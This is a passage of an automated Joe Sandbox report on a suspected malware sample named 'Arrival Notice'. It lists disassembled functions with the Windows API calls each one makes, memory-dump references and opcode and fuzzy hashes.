                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Process$CloseCountersCurrentHandleOpen
                  • String ID:
                  • API String ID: 3488606520-0
                  • Opcode ID: cd910f65f5a25fc319052957bdd0150809ce6926158c41056bbf882ec579f9ac
                  • Instruction ID: 49d4d96db18b8b3c90446c81276d32ebbce3a53a55851a6673aec1ad9a6a6553
                  • Opcode Fuzzy Hash: cd910f65f5a25fc319052957bdd0150809ce6926158c41056bbf882ec579f9ac
                  • Instruction Fuzzy Hash: 46A1D271604300AFD724DF24C882F2AB7E1AF88714F14885DF59A9B7D2DB74EC418B92
                  Function 0041E3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 0041DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0041CF22,?), ref: 0041DDFD
                    • Part of subcall function 0041DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0041CF22,?), ref: 0041DE16
                    • Part of subcall function 0041E199: GetFileAttributesW.KERNEL32(?,0041CF95), ref: 0041E19A
                  • lstrcmpiW.KERNEL32(?,?), ref: 0041E473
                  • MoveFileW.KERNEL32(?,?), ref: 0041E4AC
                  • _wcslen.LIBCMT ref: 0041E5EB
                  • _wcslen.LIBCMT ref: 0041E603
                  • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 0041E650
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                  • String ID:
                  • API String ID: 3183298772-0
                  • Opcode ID: 0678943bdb0a9ac1f8a8ae574292ba07c4beab8dffa50972c4649c4e681a8a96
                  • Instruction ID: 0b43eb42eb26b18f2b8a4f0afd36d55e08da0a70a5e898912f2fda76333c3c72
                  • Opcode Fuzzy Hash: 0678943bdb0a9ac1f8a8ae574292ba07c4beab8dffa50972c4649c4e681a8a96
                  • Instruction Fuzzy Hash: 885186B24083459BC725DB91DC81ADF73ECAF85344F00491FF689D7151EF78A588876A
                  Function 0043B9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                    • Part of subcall function 0043C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0043B6AE,?,?), ref: 0043C9B5
                    • Part of subcall function 0043C998: _wcslen.LIBCMT ref: 0043C9F1
                    • Part of subcall function 0043C998: _wcslen.LIBCMT ref: 0043CA68
                    • Part of subcall function 0043C998: _wcslen.LIBCMT ref: 0043CA9E
                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0043BAA5
                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0043BB00
                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 0043BB63
                  • RegCloseKey.ADVAPI32(?,?), ref: 0043BBA6
                  • RegCloseKey.ADVAPI32(00000000), ref: 0043BBB3
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                  • String ID:
                  • API String ID: 826366716-0
                  • Opcode ID: a0e2bf8bc11ef3783dd9b4ae79c50cb4c6b601a77f94a0ae2125c80eeac50f0a
                  • Instruction ID: 243c79ec798a91f86557cfd8893d3b123fa532623b2ea37a9cbe7ddf16bd4627
                  • Opcode Fuzzy Hash: a0e2bf8bc11ef3783dd9b4ae79c50cb4c6b601a77f94a0ae2125c80eeac50f0a
                  • Instruction Fuzzy Hash: 6661B131208201AFD714DF14C490F6ABBE5FF88308F14959EF6998B6A2CB35ED45CB92
                  Function 00418BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                  Download Yara Rule
                  APIs
                  • VariantInit.OLEAUT32(?), ref: 00418BCD
                  • VariantClear.OLEAUT32 ref: 00418C3E
                  • VariantClear.OLEAUT32 ref: 00418C9D
                  • VariantClear.OLEAUT32(?), ref: 00418D10
                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00418D3B
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Variant$Clear$ChangeInitType
                  • String ID:
                  • API String ID: 4136290138-0
                  • Opcode ID: 1f84451c20de4339c6cac630abc431307a7f9df9da1fbfc7c96ae00f798611a3
                  • Instruction ID: c1a7e41a76a2ec74a55a01121bbbbcd5500832375956b6cf16ede138fdb481b3
                  • Opcode Fuzzy Hash: 1f84451c20de4339c6cac630abc431307a7f9df9da1fbfc7c96ae00f798611a3
                  • Instruction Fuzzy Hash: CC5169B5A00219EFCB14CF68D884AAAB7F8FF89314B15856AF905DB350E734E911CF94
                  Function 00428AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                  Download Yara Rule
                  APIs
                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00428BAE
                  • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00428BDA
                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00428C32
                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00428C57
                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00428C5F
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: PrivateProfile$SectionWrite$String
                  • String ID:
                  • API String ID: 2832842796-0
                  • Opcode ID: 9cb2cdf6ae1b9420e0f5b192006747da84909b37208d5fdf35102221b801b0c7
                  • Instruction ID: 4f5ccb7ae35ccd59be72c0da3447c2e9484eb5699cc79e5533e4f8dde2e319dd
                  • Opcode Fuzzy Hash: 9cb2cdf6ae1b9420e0f5b192006747da84909b37208d5fdf35102221b801b0c7
                  • Instruction Fuzzy Hash: 60515B35A002149FCB11DF65C881EAEBBF5FF49314F088099E949AB362CB35ED41CBA0
                  Function 00438EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                  Download Yara Rule
                  APIs
                  • LoadLibraryW.KERNEL32(?,00000000,?), ref: 00438F40
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00438FD0
                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00438FEC
                  • GetProcAddress.KERNEL32(00000000,?), ref: 00439032
                  • FreeLibrary.KERNEL32(00000000), ref: 00439052
                    • Part of subcall function 003CF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00421043,?,753CE610), ref: 003CF6E6
                    • Part of subcall function 003CF6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,0040FA64,00000000,00000000,?,?,00421043,?,753CE610,?,0040FA64), ref: 003CF70D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                  • String ID:
                  • API String ID: 666041331-0
                  • Opcode ID: 04c532f46edabdf48f46a098288ad06e0f7c894c071caa9d51db33e7d02a88f4
                  • Instruction ID: 62808feb1f71e3321d8d744645850f31e40fb8d0f90c83b6dcc4b9fc9ba1438e
                  • Opcode Fuzzy Hash: 04c532f46edabdf48f46a098288ad06e0f7c894c071caa9d51db33e7d02a88f4
                  • Instruction Fuzzy Hash: 0E514934604205DFC715DF54C4848AABBB1FF49314F0880AAE90A9B762DB75ED86CF95
                  Function 00446B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON
                  Download Yara Rule
                  APIs
                  • SetWindowLongW.USER32(00000002,000000F0,?), ref: 00446C33
                  • SetWindowLongW.USER32(?,000000EC,?), ref: 00446C4A
                  • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00446C73
                  • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,0042AB79,00000000,00000000), ref: 00446C98
                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00446CC7
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$Long$MessageSendShow
                  • String ID:
                  • API String ID: 3688381893-0
                  • Opcode ID: e1024ea53d0c958d9220f0fe8594b53e420d24e553cf38e8b220c9cc04058555
                  • Instruction ID: 2db7309644ad26d06ca3e9d5d4782f681e0d5b057c1b83941c965191c113d940
                  • Opcode Fuzzy Hash: e1024ea53d0c958d9220f0fe8594b53e420d24e553cf38e8b220c9cc04058555
                  • Instruction Fuzzy Hash: 2C41F735A00114AFE724CF68CCD4FAA7BA5EB0B350F16022AF895A73E0C375ED41CA49
                  Function 003E2051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _free
                  • String ID:
                  • API String ID: 269201875-0
                  • Opcode ID: 9b8469b75fb527ae136614404d66eab1fc55a23d21a676ad589a5b91e99c3085
                  • Instruction ID: 3f99874bd38d3e47b9b1ab1d8a82c2b1eeca995085a8a6339c74ecc3ec857b32
                  • Opcode Fuzzy Hash: 9b8469b75fb527ae136614404d66eab1fc55a23d21a676ad589a5b91e99c3085
                  • Instruction Fuzzy Hash: 2241E232A002549FCB26DF79C881A5EB3A9EF89314F164669E515EB3D2D731AE01CB80
                  Function 003C912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON
                  Download Yara Rule
                  APIs
                  • GetCursorPos.USER32(?), ref: 003C9141
                  • ScreenToClient.USER32(00000000,?), ref: 003C915E
                  • GetAsyncKeyState.USER32(00000001), ref: 003C9183
                  • GetAsyncKeyState.USER32(00000002), ref: 003C919D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: AsyncState$ClientCursorScreen
                  • String ID:
                  • API String ID: 4210589936-0
                  • Opcode ID: 66ba218f86a41b78ff8853fd676a5696fa3493b88a84c3a546da6e56554d9770
                  • Instruction ID: 1ec8eba47bbd1bc3f919f03ffe77eb94b554099006132d7781a0321482f90c08
                  • Opcode Fuzzy Hash: 66ba218f86a41b78ff8853fd676a5696fa3493b88a84c3a546da6e56554d9770
                  • Instruction Fuzzy Hash: 2F418231A0851AFBDF069F64C889BEEB774FF05324F25822AE425A72D0C7746D50CB96
                  Function 00423874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON
                  Download Yara Rule
                  APIs
                  • GetInputState.USER32 ref: 004238CB
                  • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00423922
                  • TranslateMessage.USER32(?), ref: 0042394B
                  • DispatchMessageW.USER32(?), ref: 00423955
                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00423966
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                  • String ID:
                  • API String ID: 2256411358-0
                  • Opcode ID: 1aef0dd9dcb62633d05b3ee9714e0f598f81d74d7877ef87d03045bb99b18334
                  • Instruction ID: f441bb0457df672a12810421fc009921008162e2cf5c46513f74fdecb6b45ecc
                  • Opcode Fuzzy Hash: 1aef0dd9dcb62633d05b3ee9714e0f598f81d74d7877ef87d03045bb99b18334
                  • Instruction Fuzzy Hash: C53199F06042619EEB25DF34A849B6B37F89B06305F44096FD452C62A0D7BC95C5CB19
                  Function 0042CF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON
                  Download Yara Rule
                  APIs
                  • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0042CF38
                  • InternetReadFile.WININET(?,00000000,?,?), ref: 0042CF6F
                  • GetLastError.KERNEL32(?,00000000,?,?,?,0042C21E,00000000), ref: 0042CFB4
                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,0042C21E,00000000), ref: 0042CFC8
                  • SetEvent.KERNEL32(?,?,00000000,?,?,?,0042C21E,00000000), ref: 0042CFF2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                  • String ID:
                  • API String ID: 3191363074-0
                  • Opcode ID: b6dd0cf9213409700ea0ebba866fc147b5ee3753e9cc5b837bf74b3a7d78f0c3
                  • Instruction ID: d29ee53ea83a2fb751d261ef8a3ed7ac019401550ba392b47550a0f75d1137a8
                  • Opcode Fuzzy Hash: b6dd0cf9213409700ea0ebba866fc147b5ee3753e9cc5b837bf74b3a7d78f0c3
                  • Instruction Fuzzy Hash: 27319F71600215EFDB20DFA5E9C4AAFBBFAEF04350B50402EF506D2280DB34AE41DB68
                  Function 00411901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON
                  Download Yara Rule
                  APIs
                  • GetWindowRect.USER32(?,?), ref: 00411915
                  • PostMessageW.USER32(00000001,00000201,00000001), ref: 004119C1
                  • Sleep.KERNEL32(00000000,?,?,?), ref: 004119C9
                  • PostMessageW.USER32(00000001,00000202,00000000), ref: 004119DA
                  • Sleep.KERNEL32(00000000,?,?,?,?), ref: 004119E2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessagePostSleep$RectWindow
                  • String ID:
                  • API String ID: 3382505437-0
                  • Opcode ID: 851ce820bfd706658353744b3b8467bde5efca00f798c8497e66ef3276016392
                  • Instruction ID: 8a8adc775d4a35a2298da7fc383cdcda04e1d39b3f18fc4b4581212a8b235a3e
                  • Opcode Fuzzy Hash: 851ce820bfd706658353744b3b8467bde5efca00f798c8497e66ef3276016392
                  • Instruction Fuzzy Hash: A631D6B5910219EFCB00CFA8CD99ADE3BB5EB05315F104226FA31A72E1C7749D54CB95
                  Function 00445706 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00445745
                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 0044579D
                  • _wcslen.LIBCMT ref: 004457AF
                  • _wcslen.LIBCMT ref: 004457BA
                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00445816
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend$_wcslen
                  • String ID:
                  • API String ID: 763830540-0
                  • Opcode ID: c8bd6e53409aaa66cb6f34a65e81de132de4449b29b21157d503ffc8b5748cf6
                  • Instruction ID: 20eaebf2a7f37ec5930dc119334c6fc9d67aa9154d9e0dac73d41d28a5076a8d
                  • Opcode Fuzzy Hash: c8bd6e53409aaa66cb6f34a65e81de132de4449b29b21157d503ffc8b5748cf6
                  • Instruction Fuzzy Hash: DD21A5759046189BEF20DF60CC85AEE77B8FF05324F108227E919EA281D7748985CF54
                  Function 00430930 Relevance: 7.6, APIs: 5, Instructions: 69COMMON
                  Download Yara Rule
                  APIs
                  • IsWindow.USER32(00000000), ref: 00430951
                  • GetForegroundWindow.USER32 ref: 00430968
                  • GetDC.USER32(00000000), ref: 004309A4
                  • GetPixel.GDI32(00000000,?,00000003), ref: 004309B0
                  • ReleaseDC.USER32(00000000,00000003), ref: 004309E8
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Window$ForegroundPixelRelease
                  • String ID:
                  • API String ID: 4156661090-0
                  • Opcode ID: fc0617a2035df23ee3739747604fac4e524c5f5fd38388b4665b62372ecaa4ae
                  • Instruction ID: 06e6d19c99c5535d03247864fbad412c45260ef88d880725854145cde69434cb
                  • Opcode Fuzzy Hash: fc0617a2035df23ee3739747604fac4e524c5f5fd38388b4665b62372ecaa4ae
                  • Instruction Fuzzy Hash: E021DE39600214AFD710EF65D884AAEBBF8EF49704F04807DF84A97762CB34AC00CB94
                  Function 003ECDBD Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                  Download Yara Rule
                  APIs
                  • GetEnvironmentStringsW.KERNEL32 ref: 003ECDC6
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 003ECDE9
                    • Part of subcall function 003E3820: RtlAllocateHeap.NTDLL(00000000,?,00481444,?,003CFDF5,?,?,003BA976,00000010,00481440,003B13FC,?,003B13C6,?,003B1129), ref: 003E3852
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 003ECE0F
                  • _free.LIBCMT ref: 003ECE22
                  • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 003ECE31
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                  • String ID:
                  • API String ID: 336800556-0
                  • Opcode ID: 32f7222144f9fa1be28873e9a884ac891d5ccb099712e38f740ec121c50f0612
                  • Instruction ID: 9432618e39294729fefec6b5c979cd1d4fc1c71eaa8a68273c9421015f618c5b
                  • Opcode Fuzzy Hash: 32f7222144f9fa1be28873e9a884ac891d5ccb099712e38f740ec121c50f0612
                  • Instruction Fuzzy Hash: 1E01D8726122B57F63221B776C8CC7F696DDEC7BA23161329FD05D7181DA618D0281B4
                  Function 003C9639 Relevance: 7.6, APIs: 5, Instructions: 66COMMON
                  Download Yara Rule
                  APIs
                  • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 003C9693
                  • SelectObject.GDI32(?,00000000), ref: 003C96A2
                  • BeginPath.GDI32(?), ref: 003C96B9
                  • SelectObject.GDI32(?,00000000), ref: 003C96E2
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ObjectSelect$BeginCreatePath
                  • String ID:
                  • API String ID: 3225163088-0
                  • Opcode ID: f04c96c33b9c1f428e0e53c72baca924f567b4a9fe373344a3361e1fe341acc4
                  • Instruction ID: 2c1f388b1d8b7ec2b8bb353435f61bcc7bcd5c364a2e9c898832ca1948ac8508
